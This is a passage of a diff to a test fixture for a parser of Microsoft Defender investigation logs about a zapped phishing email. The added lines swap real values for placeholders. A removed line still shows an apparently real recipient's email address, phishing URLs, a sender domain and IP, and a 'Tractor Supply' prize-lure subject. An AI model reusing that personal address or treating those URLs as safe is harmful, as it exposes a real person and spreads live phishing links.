NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b;wdezd.ersdz.meradebo.com;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:7350e5b982beaa3846d327a005dd57d6\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"EndTimeUtc\":\"2024-09-02T03:33:31\",\"InvestigationId\":\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"InvestigationType\":\"ZappedUrlInvestigation\",\"LastUpdateTimeUtc\":\"2024-09-02T03:28:24\",\"RunningTime\":771,\"StartTimeUtc\":\"2024-09-02T03:20:40\",\"Status\":\"Pending Action\"}"
+    "message": "{\"CreationTime\":\"2024-09-02T03:33:37\",\"Id\":\"1234ab56-7890-1234-c5de-678fabcd9012\",\"Operation\":\"AirInvestigationData\",\"OrganizationId\":\"123abc456-d789-0e1f-2a34-b56789c01234\",\"RecordType\":64,\"UserKey\":\"AirInvestigation\",\"UserType\":4,\"Version\":1,\"Workload\":\"AirInvestigation\",\"ObjectId\":\"1234ab56-7890-1234-c5de-678fabcd9012\",\"UserId\":\"AirInvestigation\",\"Actions\":[\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:12345a6789bc01de23456f789ab0\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"Recipient\\\":\\\"user@mailbox.com\\\",\\\"Urls\\\":[\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"https://website.net/up/24/35/image.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"sender@test.integration.com\\\",\\\"P1Sender\\\":\\\"p1sender@test.integration.com\\\",\\\"P1SenderDomain\\\":\\\"test.integration.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"sender@test.integration.com\\\",\\\"P2SenderDisplayName\\\":\\\"P2 name\\\",\\\"P2SenderDomain\\\":\\\"test.integration.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"InternetMessageId\\\":\\\"<message.id.test@0123456789.userabc.mail.com>\\\",\\\"Subject\\\":\\\"Subject of the mail\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:01abc23d456efa7bc8901234d5efa67b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"}],\\\"RelatedAlertIds\\\":[\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\",\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:012345a6789bcd0e1f23a4b5cd678ef9\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"01a2bcd3-efab-4c56-7890-12defa3bc4d\\\",\\\"0123a456-b789-0cd1-e23f-45abcd6ef78\\\",\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"01a2b345-67c8-9012-345d-67efabc8d90e\\\",\\\"01a234b5-6789-012c-3d4e-56fabcd7ef8\\\",\\\"a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6\\\",\\\"0a1b23c4-567d-8901-2345-67efabc8d90a\\\",\\\"0123a4b5-678c-9d0e-1f23-45abcde6fa78\\\",\\\"0a1b234c-5678-90d1-2efa-34bcdef5a6b7\\\",\\\"0123a4bc-5d6e-78f9-0123-45abcde67890\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://test.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://test.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a0123b4c5678def901234a5b67cde890\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"RelatedAlertIds\\\":[\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"],\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"EndTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"TimeGenerated\\\":\\\"2024-09-02T03:16:43.91Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"URLList\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"8a5bf71a-d9e4-422e-8bdb-33272de66983\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"InvestigationStatus\\\":\\\"Pending\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\"],\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fa01234567-89a0-1234-5b67-89cdefa0b12\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Recipient\\\":\\\"user@mailbox.com\\\",\\\"Urls\\\":[\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"https://website.net/up/24/35/image.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"sender@test.integration.com\\\",\\\"P1Sender\\\":\\\"p1sender@test.integration.com\\\",\\\"P1SenderDomain\\\":\\\"test.integration.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"sender@test.integration.com\\\",\\\"P2SenderDisplayName\\\":\\\"P2 name\\\",\\\"P2SenderDomain\\\":\\\"test.integration.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"InternetMessageId\\\":\\\"<message.id.test@0123456789.userabc.mail.com>\\\",\\\"Subject\\\":\\\"Subject of the mail\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:01abc23d456efa7bc8901234d5efa67b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"4\\\",\\\"MailboxPrimaryAddress\\\":\\\"user@mailbox.com\\\",\\\"Upn\\\":\\\"user@mailbox.com\\\",\\\"AadId\\\":\\\"0123ac45-6c7d-e89f-a0123b45c6d7\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:1a2b3456c7defabc8901d2e3fa456789\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"5\\\",\\\"Url\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":12,\\\"Urn\\\":\\\"urn:UrlEntity:0123a4567b8c9de0fa123bcde4f5a6b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"6\\\",\\\"NetworkMessageIds\\\":[\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Subject of the mail\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Subject of the mail;1.2.3.4;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:01a2bc345678de901f2a34b567cdef89\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"7\\\",\\\"NetworkMessageIds\\\":[\\\"01a2bcd3-efab-4c56-7890-12defa3bc4d\\\",\\\"0123a456-b789-0cd1-e23f-45abcd6ef78\\\",\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"01a2b345-67c8-9012-345d-67efabc8d90e\\\",\\\"01a234b5-6789-012c-3d4e-56fabcd7ef8\\\",\\\"a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6\\\",\\\"0a1b23c4-567d-8901-2345-67efabc8d90a\\\",\\\"0123a4b5-678c-9d0e-1f23-45abcde6fa78\\\",\\\"0a1b234c-5678-90d1-2efa-34bcdef5a6b7\\\",\\\"0123a4bc-5d6e-78f9-0123-45abcde67890\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://test.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://test.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a0123b4c5678def901234a5b67cde890\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Subject of the mail\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"test.integration.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Subject of the mail;test.integration.com;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:7350e5b982beaa3846d327a005dd57d6\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"EndTimeUtc\":\"2024-09-02T03:33:31\",\"InvestigationId\":\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\",\"InvestigationType\":\"ZappedUrlInvestigation\",\"LastUpdateTimeUtc\":\"2024-09-02T03:28:24\",\"RunningTime\":771,\"StartTimeUtc\":\"2024-09-02T03:20:40\",\"Status\":\"Pending Action\"}"
   },
   "expected": {
-    "message": "{\"CreationTime\":\"2024-09-02T03:33:37\",\"Id\":\"8217bd67-1368-4213-b6be-498cdbff1542\",\"Operation\":\"AirInvestigationData\",\"OrganizationId\":\"275ae857-f201-4a2e-8f43-d48391c56871\",\"RecordType\":64,\"UserKey\":\"AirInvestigation\",\"UserType\":4,\"Version\":1,\"Workload\":\"AirInvestigation\",\"ObjectId\":\"8217bd67-1368-4213-b6be-498cdbff1542\",\"UserId\":\"AirInvestigation\",\"Actions\":[\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:48971b6852ea31ff93989b88b832bca5\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"Recipient\\\":\\\"ggravier@ixina.com\\\",\\\"Urls\\\":[\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"https://zupimages.net/up/24/35/1itk.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P1Sender\\\":\\\"okhmqyjdcdn.bfwmwyytludfovodgfouzyeg@wdezd.ersdz.meradebo.com\\\",\\\"P1SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"SenderIP\\\":\\\"40.107.244.101\\\",\\\"P2Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P2SenderDisplayName\\\":\\\"Tractor Supply\\\",\\\"P2SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"InternetMessageId\\\":\\\"<t8x4f5wr3iqw6v62mv5c8gyb9p2v7b91.88246820.v0o2qn@0u8putyigk5lk58rp6upohpkyzd5.namprd3666.prod.outlook.com>\\\",\\\"Subject\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:98fed74e812bdb3dd6241259c9afe88d\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"}],\\\"RelatedAlertIds\\\":[\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's 